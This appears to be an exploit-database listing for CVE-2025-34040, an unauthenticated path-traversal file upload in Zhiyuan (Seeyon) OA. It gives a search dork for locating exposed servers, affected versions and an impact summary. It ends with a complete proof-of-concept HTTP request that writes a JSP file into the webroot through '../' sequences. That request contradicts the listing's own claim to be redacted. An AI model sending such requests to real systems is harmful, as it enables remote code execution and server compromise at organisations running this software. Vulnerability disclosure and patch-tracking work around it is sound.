Exploit for 📄 Zhiyuan OA Traversal / File Upload CVE-2025-34040

Name: Exploit for 📄 Zhiyuan OA Traversal / File Upload CVE-2025-34040
Rating: 5 (89 reviews)
2026-04-06 | CVSS 10.0
## https://sploitus.com/exploit?id=PACKETSTORM:218383
# Exploit Title: Zhiyuan OA  - arbitrary file upload leading 
    # Google Dork / FOFA: app="致远互联-OA" && title="V8.0SP2"
    # Date: 1-11-2025
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor Homepage: https://service.seeyon.com/
    # Software Link: [vendor download / product page if available]
    # Version: 5.0, 5.1–5.6sp1, 6.0–6.1sp2, 7.0–7.1sp1, 8.0–8.0sp2 (per NVD/VulnCheck)
    # Tested on: MacOS
    # CVE: CVE-2025-34040
    
    Description:
    A path-traversal / improper validation in the multipart file upload handling of Zhiyuan OA's `wpsAssistServlet` allows an unauthenticated actor (or actor able to reach upload endpoint) to place crafted files outside the intended directories by controlling `realFileType` and `fileId` parameters. Under affected configurations, an uploaded JSP can be stored in the webroot and executed, yielding remote code execution.
    
    High-level reproduction template (redacted — non-actionable):
    POST request to `/seeyon/wpsAssistServlet` with multipart/form-data. The `realFileType` parameter is used to resolve the target path; insufficient validation permits `..` sequences leading to writes under webapp root. The uploaded file contents must be controlled to produce a server-side executable file (e.g., JSP) — DO NOT include such server-side code here.
    
    Impact:
    - Remote code execution if the uploaded file is accessible and executable.
    - Complete server compromise and pivoting to internal networks.
    - Data exfiltration, persistence, and further lateral movement.
    
    References:
    - NVD CVE-2025-34040 (NVD entry – awaiting enrichment)
    - VulnCheck advisory: https://vulncheck.com/advisories/zhiyuan-oa-system-path-traversal-file-upload
    - CNVD entry: https://www.cnvd.org.cn/flaw/show/CNVD-2021-01627
    - Vendor patch/notice: https://service.seeyon.com/patchtools/tp.html
    
    POC;
    POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
    Host: 
    Content-Type: multipart/form-data; boundary=......
    Accept-Encoding: gzip
    
    --......
    Content-Disposition: form-data; name="upload"; filename="123.xls"
    Content-Type: application/vnd.ms-excel
    
    <% out.println("HelloWorld");%>
    --.......--